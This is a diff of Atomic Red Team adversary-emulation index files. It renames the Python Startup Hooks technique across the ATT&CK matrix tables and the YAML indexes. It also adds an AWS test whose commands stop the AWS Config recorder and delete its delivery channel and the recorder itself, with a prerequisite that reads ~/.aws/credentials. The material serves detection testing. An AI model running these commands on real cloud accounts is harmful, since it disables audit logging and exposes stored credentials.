 |  |  | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) |  | Junk Code Insertion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) |  |  |  |  |  | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) |  |
@@ -82,7 +82,7 @@
 |  |  | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) |  |  |  |  |  |  |  |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) |  |  |  |  |  |  |  |
 |  |  | Container Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) |  |  |  |  |  |  |  |
-|  |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) |  |  |  |  |  |  |  |
+|  |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) |  |  |  |  |  |  |  |
 |  |  | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md) |  |  |  |  |  |  |  |
 |  |  | [IIS Components](../../T1505.004/T1505.004.md) | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | [File and Directory Permissions Modification](../../T1222/T1222.md) |  |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution](../../T1546/T1546.md) | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | Junk Code Insertion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -94,7 +94,7 @@
 |  |  | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Cloud Application Integration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) |  |  |  |  |  |  |  |
+|  |  | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) |  |  |  |  |  |  |  |
 |  |  | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Email Delegate Permissions](../../T1098.002/T1098.002.md) | Extended Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [BITS Jobs](../../T1197/T1197.md) | TCC Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -23,7 +23,7 @@
 | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) |  | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | Wi-Fi Networks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | [Hide Artifacts](../../T1564/T1564.md) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtual Machine Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Bombing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Video Capture](../../T1125/T1125.md) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Video Capture](../../T1125/T1125.md) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
 |  | Malicious Copy and Paste [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) |  | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) |  | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
 |  | [System Services: Service Execution](../../T1569.002/T1569.002.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [System Network Connections Discovery](../../T1049/T1049.md) |  | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) |  | Remote Access Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -59,7 +59,7 @@
 |  |  | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Account Manipulation](../../T1098/T1098.md) | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Rogue Domain Controller](../../T1207/T1207.md) |  |  |  |  |  |  |  |
 |  |  | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Subvert Trust Controls: Code Signing Policy Modification](../../T1553.006/T1553.006.md) |  |  |  |  |  |  |  |
-|  |  | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Registry](../../T1112/T1112.md) |  |  |  |  |  |  |  |
+|  |  | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) | [Modify Registry](../../T1112/T1112.md) |  |  |  |  |  |  |  |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) |  |  |  |  |  |  |  |
 |  |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) |  |  |  |  |  |  |  |
@@ -70,7 +70,7 @@
 |  |  | [Office Application Startup: Outlook Home Page](../../T1137.004/T1137.004.md) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Process Injection: ListPlanting](../../T1055.015/T1055.015.md) | [Create Process with Token](../../T1134.002/T1134.002.md) |  |  |  |  |  |  |  |
 |  |  | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Odbcconf](../../T1218.008/T1218.008.md) |  |  |  |  |  |  |  |
-|  |  | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [BITS Jobs](../../T1197/T1197.md) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) |  |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -20753,7 +20753,7 @@ privilege-escalation:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -20789,6 +20789,7 @@ privilege-escalation:
      - macOS
      - Windows
      x_mitre_version: '1.0'
+      identifier: T1546.018
    atomic_tests: []
  T1037.003:
    technique:
@@ -32773,7 +32774,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -32809,6 +32810,7 @@ persistence:
      - macOS
      - Windows
      x_mitre_version: '1.0'
+      identifier: T1546.018
    atomic_tests: []
  T1037.003:
    technique:
@@ -20411,7 +20411,7 @@ privilege-escalation:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -20447,6 +20447,7 @@ privilege-escalation:
      - macOS
      - Windows
      x_mitre_version: '1.0'
+      identifier: T1546.018
    atomic_tests: []
  T1037.003:
    technique:
@@ -32210,7 +32211,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -32246,6 +32247,7 @@ persistence:
      - macOS
      - Windows
      x_mitre_version: '1.0'
+      identifier: T1546.018
    atomic_tests: []
  T1037.003:
    technique:
@@ -20062,7 +20062,7 @@ privilege-escalation:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -20098,6 +20098,7 @@ privilege-escalation:
      - macOS
      - Windows
      x_mitre_version: '1.0'
+      identifier: T1546.018
    atomic_tests: []
  T1037.003:
    technique:
@@ -31494,7 +31495,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -31530,6 +31531,7 @@ persistence:
      - macOS
      - Windows
      x_mitre_version: '1.0'
+      identifier: T1546.018
    atomic_tests: []
  T1037.003:
    technique:
@@ -20120,7 +20120,7 @@ privilege-escalation:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -20156,6 +20156,7 @@ privilege-escalation:
      - macOS
      - Windows
      x_mitre_version: '1.0'
+      identifier: T1546.018
    atomic_tests: []
  T1037.003:
    technique:
@@ -31610,7 +31611,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -31646,6 +31647,7 @@ persistence:
      - macOS
      - Windows
      x_mitre_version: '1.0'
+      identifier: T1546.018
    atomic_tests: []
  T1037.003:
    technique:
@@ -20062,7 +20062,7 @@ privilege-escalation:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -20098,6 +20098,7 @@ privilege-escalation:
      - macOS
      - Windows
      x_mitre_version: '1.0'
+      identifier: T1546.018
    atomic_tests: []
  T1037.003:
    technique:
@@ -31494,7 +31495,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -31530,6 +31531,7 @@ persistence:
      - macOS
      - Windows
      x_mitre_version: '1.0'
+      identifier: T1546.018
    atomic_tests: []
  T1037.003:
    technique:
@@ -11173,6 +11173,61 @@ defense-evasion:
        cleanup_command:
        name: sh
        elevation_required: false
+    - name: AWS - Config Logs Disabled
+      auto_generated_guid: 4608bc1b-e682-466b-a7d7-dbd76760db31
+      description: 'Disables AWS Config by stopping the configuration recorder, deleting
+        the delivery channel, and deleting the configuration recorder. An attacker
+        with sufficient permissions can use this to stop configuration change recording
+        and avoid detection of subsequent activity.
+
+        '
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        configuration_recorder_name:
+          description: Name of the configuration recorder
+          type: string
+          default: redatomictestconfigurationrecorder
+        delivery_channel_name:
+          description: Name of the delivery channel
+          type: string
+          default: redatomictestdeliverychannel
+        region:
+          description: Name of the region
+          type: string
+          default: us-west-2
+      dependencies:
+      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+          '
+        prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+          '
+        get_prereq_command: 'echo Please install the aws-cli and configure your AWS
+          default profile using: aws configure
+
+          '
+      - description: 'Check if terraform is installed.
+
+          '
+        prereq_command: 'terraform version
+
+          '
+        get_prereq_command: 'echo Please install terraform and configure your AWS
+          default profile
+
+          '
+      executor:
+        command: |
+          aws configservice stop-configuration-recorder --configuration-recorder-name #{configuration_recorder_name} --region #{region}
+          echo "*** Configuration recorder stopped ***"
+          aws configservice delete-delivery-channel --delivery-channel-name #{delivery_channel_name} --region #{region}
+          echo "*** Delivery channel deleted ***"
+          aws configservice delete-configuration-recorder --configuration-recorder-name #{configuration_recorder_name} --region #{region}
+          echo "*** Configuration recorder deleted ***"
+        cleanup_command: aws configservice list-configuration-recorders --region us-west-2
+        name: sh
+        elevation_required: false
  T1564.003:
    technique:
      type: attack-pattern
@@ -20554,7 +20609,7 @@ privilege-escalation:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -20590,6 +20645,7 @@ privilege-escalation:
      - macOS
      - Windows
      x_mitre_version: '1.0'
+      identifier: T1546.018
    atomic_tests: []
  T1037.003:
    technique:
@@ -32225,7 +32281,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -32261,6 +32317,7 @@ persistence:
      - macOS
      - Windows
      x_mitre_version: '1.0'
+      identifier: T1546.018
    atomic_tests: []
  T1037.003:
    technique:
@@ -20440,7 +20440,7 @@ privilege-escalation:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -20476,6 +20476,7 @@ privilege-escalation:
      - macOS
      - Windows
      x_mitre_version: '1.0'
+      identifier: T1546.018
    atomic_tests: []
  T1037.003:
    technique:
@@ -32114,7 +32115,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -32150,6 +32151,7 @@ persistence:
      - macOS
      - Windows
      x_mitre_version: '1.0'
+      identifier: T1546.018
    atomic_tests: []
  T1037.003:
    technique:
@@ -20349,7 +20349,7 @@ privilege-escalation:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -20385,6 +20385,7 @@ privilege-escalation:
      - macOS
      - Windows
      x_mitre_version: '1.0'
+      identifier: T1546.018
    atomic_tests: []
  T1037.003:
    technique:
@@ -31972,7 +31973,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -32008,6 +32009,7 @@ persistence:
      - macOS
      - Windows
      x_mitre_version: '1.0'
+      identifier: T1546.018
    atomic_tests: []
  T1037.003:
    technique:
@@ -2048,7 +2048,6 @@ defense-evasion:
          $encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
          $bytes = [System.Convert]::FromBase64String($encodedString)
          $decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
-
          #write the decoded eicar string to file
          $decodedString | Out-File T1027.013_decodedEicar.txt
        cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
@@ -2066,15 +2065,58 @@ defense-evasion:
        command: |-
